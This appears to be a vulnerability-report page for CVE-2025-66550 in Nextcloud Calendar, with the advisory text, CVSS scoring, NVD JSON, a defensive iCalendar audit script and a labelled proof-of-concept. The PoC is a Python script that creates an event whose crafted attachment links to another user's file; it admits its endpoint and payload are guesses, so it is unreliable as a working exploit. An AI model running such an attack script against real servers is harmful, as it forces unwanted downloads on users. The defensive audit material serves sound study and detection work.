Security Vulnerability Report
CVE-2025-66550 CVSS 5.7 MEDIUM

CVE-2025-66550

Published: 2025-12-05 17:16:06
Last Modified: 2025-12-10 14:13:31

Description

Nextcloud Calendar is a calendar app for Nextcloud. Prior to 4.7.17 and 5.2.4, when a malicious user creates a calendar event with a crafted attachment that links to a download link of a file on the same Nextcloud server, the file would be downloaded without the user confirming the action. This vulnerability is fixed in 4.7.17 and 5.2.4.
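
As an added example, not code from the Nextcloud project or from this report: a small audit script that parses iCalendar data and flags VEVENT attachments whose link points back at file-serving paths on the same Nextcloud host, which is the kind of event the description above refers to. The host name, the path heuristics (/remote.php/dav/files/, /remote.php/webdav/, a trailing /download) and the sample calendar are assumptions constructed for the demonstration; a real run would feed it calendar objects exported from the server.

```python
"""Scan iCalendar (.ics) data for VEVENT attachments that point back at the
same Nextcloud host, the shape of event described for CVE-2025-66550.

Added example, not code from the Nextcloud project or from this report.
The download-path patterns and the sample calendar below are constructed."""
from urllib.parse import urlsplit

# Assumed file-serving paths on a Nextcloud host: /remote.php/dav/files/ is
# the WebDAV file tree; a trailing /download matches public-share links.
DOWNLOAD_PATH_PREFIXES = ("/remote.php/dav/files/", "/remote.php/webdav/")
DOWNLOAD_PATH_SUFFIXES = ("/download",)


def unfold_ics(text):
    """RFC 5545 unfolding: a line starting with SPACE or TAB continues the previous one."""
    lines = []
    for raw in text.replace("\r\n", "\n").split("\n"):
        if raw and raw[0] in " \t" and lines:
            lines[-1] += raw[1:]
        elif raw:
            lines.append(raw)
    return lines


def iter_attachments(ics_text):
    """Yield (uid, summary, uri) for every URI-valued ATTACH inside a VEVENT."""
    in_event, uid, summary, attaches = False, "", "", []
    for line in unfold_ics(ics_text):
        if line == "BEGIN:VEVENT":
            in_event, uid, summary, attaches = True, "", "", []
        elif line == "END:VEVENT":
            for uri in attaches:
                yield uid, summary, uri
            in_event = False
        elif in_event and ":" in line:
            name_params, _, value = line.partition(":")
            name, *params = name_params.split(";")
            name = name.upper()
            if name == "UID":
                uid = value
            elif name == "SUMMARY":
                summary = value
            elif name == "ATTACH":
                # Inline (VALUE=BINARY) attachments carry bytes, not a link; skip them.
                if not any(p.upper() == "VALUE=BINARY" for p in params):
                    attaches.append(value)


def is_same_origin_download(uri, server_host):
    """True when the URI resolves to a file-serving path on our own Nextcloud host.

    Relative links ("/remote.php/...") resolve against the calendar app's own
    origin, so they count as same-host too."""
    parts = urlsplit(uri)
    if not parts.scheme and not parts.netloc:
        if not parts.path.startswith("/"):
            return False
    elif parts.scheme not in ("http", "https") or (parts.hostname or "").lower() != server_host.lower():
        return False
    path = parts.path
    return path.startswith(DOWNLOAD_PATH_PREFIXES) or path.endswith(DOWNLOAD_PATH_SUFFIXES)


def audit(ics_text, server_host):
    """Return one finding dict per attachment that links back to server_host."""
    return [
        {"uid": uid, "summary": summary, "attach": uri}
        for uid, summary, uri in iter_attachments(ics_text)
        if is_same_origin_download(uri, server_host)
    ]


# Constructed sample: a WebDAV link back to the server (folded across two
# lines), an external link, a public-share /download link and an inline blob.
SAMPLE_ICS = (
    "BEGIN:VCALENDAR\r\nVERSION:2.0\r\n"
    "BEGIN:VEVENT\r\nUID:evt-1\r\nSUMMARY:Team Meeting - Please Review\r\n"
    "ATTACH;FMTTYPE=text/plain:https://cloud.example.org/remote.php/dav/files/ad\r\n"
    " min/sensitive_document.pdf\r\n"
    "ATTACH:https://docs.example.com/agenda.pdf\r\n"
    "END:VEVENT\r\n"
    "BEGIN:VEVENT\r\nUID:evt-2\r\nSUMMARY:Lunch\r\n"
    "ATTACH:https://cloud.example.org/s/abc123/download\r\n"
    "ATTACH;VALUE=BINARY;ENCODING=BASE64:SGVsbG8=\r\n"
    "END:VEVENT\r\nEND:VCALENDAR\r\n"
)

if __name__ == "__main__":
    for f in audit(SAMPLE_ICS, "cloud.example.org"):
        print(f"[!] {f['uid']} ({f['summary']}): same-host download link {f['attach']}")
```

The external agenda link and the inline BASE64 attachment are deliberately left unflagged: the behaviour described above concerns links that resolve to a download on the same server, so an audit that flags every attachment would only generate noise.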

CVSS Details

CVSS Score
5.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N
Attack Vector: Network; Attack Complexity: Low; Privileges Required: Low (an authenticated Nextcloud user creates the event); User Interaction: Required (the victim has to open the event); Scope: Unchanged; Confidentiality: None; Integrity: High; Availability: None
Exploitability Score: 2.1; Impact Score: 3.6
Weakness (CWE): CWE-241

Note the impact split of C:N/I:H: the download triggered by the crafted attachment lands on the victim's own device, so what is scored is an unwanted file written there without consent, not disclosure of server data to the attacker.

Configurations (Affected Products)

cpe:2.3:a:nextcloud:calendar:*:*:*:*:*:*:*:* - VULNERABLE (4.0.0 <= version < 4.7.17)
cpe:2.3:a:nextcloud:calendar:*:*:*:*:*:*:*:* - VULNERABLE (5.0.0 <= version < 5.2.4)
Nextcloud Calendar 4.x before 4.7.17
Nextcloud Calendar 5.x before 5.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66550 Nextcloud Calendar Attachment Download Security Bypass PoC
# This PoC demonstrates the security bypass vulnerability in Nextcloud Calendar.
#
# Note: the endpoint and the JSON body below are this script's own assumptions.
# Standard CalDAV creates an event by PUT-ing an iCalendar (text/calendar)
# object to the calendar collection, so both must be adapted to the server
# under test.
import requests

TARGET_URL = "https://vulnerable-nextcloud-server.com"
ATTACKER_TOKEN = "attacker_auth_token_here"
# File on the same Nextcloud server that the crafted attachment links to
TARGET_FILE_PATH = "/remote.php/dav/files/admin/sensitive_document.pdf"


def create_malicious_event():
    """
    Create a calendar event with a crafted attachment that links to a file
    on the same Nextcloud server for unauthorized download.
    """
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json",
    }

    # Malicious attachment pointing to an internal server file
    malicious_attachment = {
        "filename": "innocent_file.txt",
        "filesize": 1024,
        "mimetype": "text/plain",
        "uri": TARGET_FILE_PATH,
        "isAttachment": True,
    }

    event_data = {
        "summary": "Team Meeting - Please Review",
        "description": "Please download the attached agenda",
        "start": "2025-01-15T10:00:00Z",
        "end": "2025-01-15T11:00:00Z",
        "attachments": [malicious_attachment],
    }

    # Create the calendar event via the CalDAV endpoint
    endpoint = f"{TARGET_URL}/remote.php/dav/calendars/attacker/personal/"
    response = requests.post(endpoint, headers=headers, json=event_data)

    if response.status_code == 201:
        print("[+] Malicious calendar event created successfully")
        return response.headers.get("Location")
    print(f"[-] Failed to create event: {response.status_code}")
    return None


def exploit_download():
    """
    When the victim views the event and clicks the attachment, the file
    is downloaded without a confirmation prompt.
    """
    print("[*] Waiting for victim to view the malicious event...")
    print("[*] When victim clicks the attachment link, file downloads automatically")
    print("[*] File download occurs WITHOUT user confirmation (security bypass)")


if __name__ == "__main__":
    print("CVE-2025-66550 Nextcloud Calendar Security Bypass PoC")
    print("=" * 60)
    event_url = create_malicious_event()
    if event_url:
        exploit_download()

References

https://github.com/nextcloud/calendar/commit/63a6c398db01391eb9fd5297a0d4c3d6e614f769 (Patch)
https://github.com/nextcloud/calendar/pull/6971 (Issue Tracking)
https://github.com/nextcloud/security-advisories/security/advisories/GHSA-f29c-ppmv-8mcv (Patch, Vendor Advisory)
https://hackerone.com/reports/3112033 (Issue Tracking, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-66550",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-05T17:16:05.500",
    "lastModified": "2025-12-10T14:13:30.870",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Nextcloud Calendar is a calendar app for Nextcloud. Prior to 4.7.17 and 5.2.4, when a malicious user creates a calendar event with a crafted attachment that links to a download link of a file on the same Nextcloud server, the file would be downloaded without the user confirming the action. This vulnerability is fixed in 4.7.17 and 5.2.4."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
            "baseScore": 5.7,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-241"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:nextcloud:calendar:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "4.0.0",
                "versionEndExcluding": "4.7.17",
                "matchCriteriaId": "1B86471C-96D9-4152-BD53-8AC98B0C428D"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:nextcloud:calendar:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "5.0.0",
                "versionEndExcluding": "5.2.4",
                "matchCriteriaId": "833B51DE-8445-40F4-A4D4-E7B88F3C2B0C"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/nextcloud/calendar/commit/63a6c398db01391eb9fd5297a0d4c3d6e614f769",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/nextcloud/calendar/pull/6971",
        "source": "[email protected]",
        "tags": ["Issue Tracking"]
      },
      {
        "url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-f29c-ppmv-8mcv",
        "source": "[email protected]",
        "tags": ["Patch", "Vendor Advisory"]
      },
      {
        "url": "https://hackerone.com/reports/3112033",
        "source": "[email protected]",
        "tags": ["Issue Tracking", "Vendor Advisory"]
      }
    ]
  }
}